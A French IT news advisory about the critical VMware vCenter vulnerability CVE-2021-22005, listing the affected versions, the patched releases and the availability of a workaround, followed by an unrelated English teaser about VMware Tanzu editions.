Au moment d'évoquer cette vulnérabilité, Bob Plankers, Technical Marketing Architect chez VMware, précise qu'elle peut être exploitée par quelqu'un qui est capable de contacter le serveur vCenter sur le réseau (port 443), peu importe la configuration, qui est en place sur le serveur vCenter. Pour se convaincre que cette faille est réellement critique, il suffit de regarder son score CVSS 3.1 : 9.8 / 10.

Cette faille de sécurité se situe au sein du service Analytics et elle permet à un pirate d'exécuter des commandes ou un programme sur l'hôte vCenter grâce au chargement d'un fichier malveillant. L'attaquant n'a pas besoin d'être authentifié sur le serveur pour exploiter la faille et il n'y a aucune interaction requise de la part des utilisateurs, contrairement à certains cas. Cela rend la vulnérabilité facilement exploitable.

Par conséquent, il est fortement recommandé d'installer le correctif dès que possible afin de se protéger contre cette vulnérabilité référencée avec le nom CVE-2021-22005. Un serveur VMware vCenter 7.0 doit être mis à jour vers la version 7.0 U2c pour être protégé, tandis que pour un serveur vCenter 6.7, il faut viser la version 6.7 U3o.

Il est à noter que certaines versions ne sont pas affectées par cette vulnérabilité, notamment la version vCenter Server 6.5.

Pour ceux qui ne sont pas en mesure d'appliquer le correctif dès maintenant, VMware a publié une procédure pour atténuer la vulnérabilité. Cela consiste à modifier un fichier de configuration et à redémarrer les services. Tout cela est expliqué sur cette page.

Source

The post VMware : une faille critique affecte tous les serveurs vCenter 6.7 et 7.0 first appeared on IT-Connect.

VMware vSphere Tanzu: Basic vs. Standard vs. Advanced edition

17 septembre 2021 à 19:50

vSphere Tanzu is a product suite that brings container management to the VMware environment. In this post, we'll detail different Tanzu editions from VMware: Tanzu Basic, Tanzu Standard, and Tanzu Advanced.

The post VMware vSphere Tanzu: Basic vs. Standard vs. Advanced edition first appeared on 4sysops.
❌